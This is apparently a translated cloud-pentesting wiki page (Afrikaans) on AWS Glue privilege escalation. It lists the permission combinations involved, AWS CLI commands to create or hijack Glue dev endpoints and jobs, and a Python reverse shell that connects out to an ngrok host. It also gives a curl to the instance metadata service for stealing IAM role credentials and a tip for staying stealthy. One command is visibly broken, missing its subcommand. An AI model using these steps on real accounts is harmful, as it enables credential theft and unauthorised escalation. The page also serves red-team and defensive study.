AWS - Glue Privesc

glue

iam:PassRole, glue:CreateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Gebruikers met hierdie toestemmings kan 'n nuwe AWS Glue ontwikkelings-eindpunt opstel, wat 'n bestaande diensrol toewysbaar deur Glue met spesifieke toestemmings aan hierdie eindpunt.

Na die opstelling kan die aanvaller SSH in die eindpunt se instansie, en die IAM-akkrediteer van die toegewyde rol steel:

# Create endpoint
aws glue create-dev-endpoint --endpoint-name <endpoint-name> \
--role-arn <arn-role> \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Vir stealth-doeleindes word dit aanbeveel om die IAM-akkrediteer van binne die Glue virtuele masjien te gebruik.

Potensiële Impak: Privesc na die glue diensrol wat gespesifiseer is.

glue:UpdateDevEndpoint, (glue:GetDevEndpoint | glue:GetDevEndpoints)

Gebruikers met hierdie toestemming kan 'n bestaande Glue ontwikkeling eindpunt se SSH-sleutel verander, wat SSH-toegang tot dit moontlik maak. Dit stel die aanvaller in staat om opdragte uit te voer met die voorregte van die eindpunt se aangehegte rol:

# Change public key to connect
aws glue --endpoint-name target_endpoint \
--public-key file:///ssh/key.pub

# Get the public address of the instance
## You could also use get-dev-endpoints
aws glue get-dev-endpoint --endpoint-name privesctest

# SSH with the glue user
ssh -i /tmp/private.key ec2-54-72-118-58.eu-west-1.compute.amazonaws.com

Potensiële Impak: Privesc na die glue diensrol wat gebruik word.

iam:PassRole, (glue:CreateJob | glue:UpdateJob), (glue:StartJobRun | glue:CreateTrigger)

Gebruikers met iam:PassRole gekombineer met ofwel glue:CreateJob of glue:UpdateJob, en ofwel glue:StartJobRun of glue:CreateTrigger kan 'n AWS Glue werk skep of opdateer, enige Glue diensrekening aanheg, en die werk se uitvoering inisieer. Die werk se vermoëns sluit die uitvoering van arbitrêre Python-kode in, wat uitgebuit kan word om 'n omgekeerde shell te vestig. Hierdie omgekeerde shell kan dan gebruik word om die IAM geloofsbriewe van die rol wat aan die Glue werk geheg is, te eksfiltreer, wat kan lei tot potensiële ongeoorloofde toegang of aksies gebaseer op die toestemmings van daardie rol:

# Content of the python script saved in s3:
#import socket,subprocess,os
#s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
#s.connect(("2.tcp.ngrok.io",11216))
#os.dup2(s.fileno(),0)
#os.dup2(s.fileno(),1)
#os.dup2(s.fileno(),2)
#p=subprocess.call(["/bin/sh","-i"])
#To get the IAM Role creds run: curl http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy


# A Glue role with admin access was created
aws glue create-job \
--name privesctest \
--role arn:aws:iam::93424712358:role/GlueAdmin \
--command '{"Name":"pythonshell", "PythonVersion": "3", "ScriptLocation":"s3://airflow2123/rev.py"}'

# You can directly start the job
aws glue start-job-run --job-name privesctest
# Or you can create a trigger to start it
aws glue create-trigger --name triggerprivesc --type SCHEDULED \
--actions '[{"JobName": "privesctest"}]' --start-on-creation \
--schedule "0/5 * * * * *"  #Every 5mins, feel free to change

Potensiële Impak: Privesc na die glue diensrol gespesifiseer.

glue:UpdateJob

Net met die opdatering toestemming kan 'n aanvaller die IAM Kredensiale van die reeds aangehegte rol steel.

Potensiële Impak: Privesc na die glue diensrol aangeheg.

Verwysings

• https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/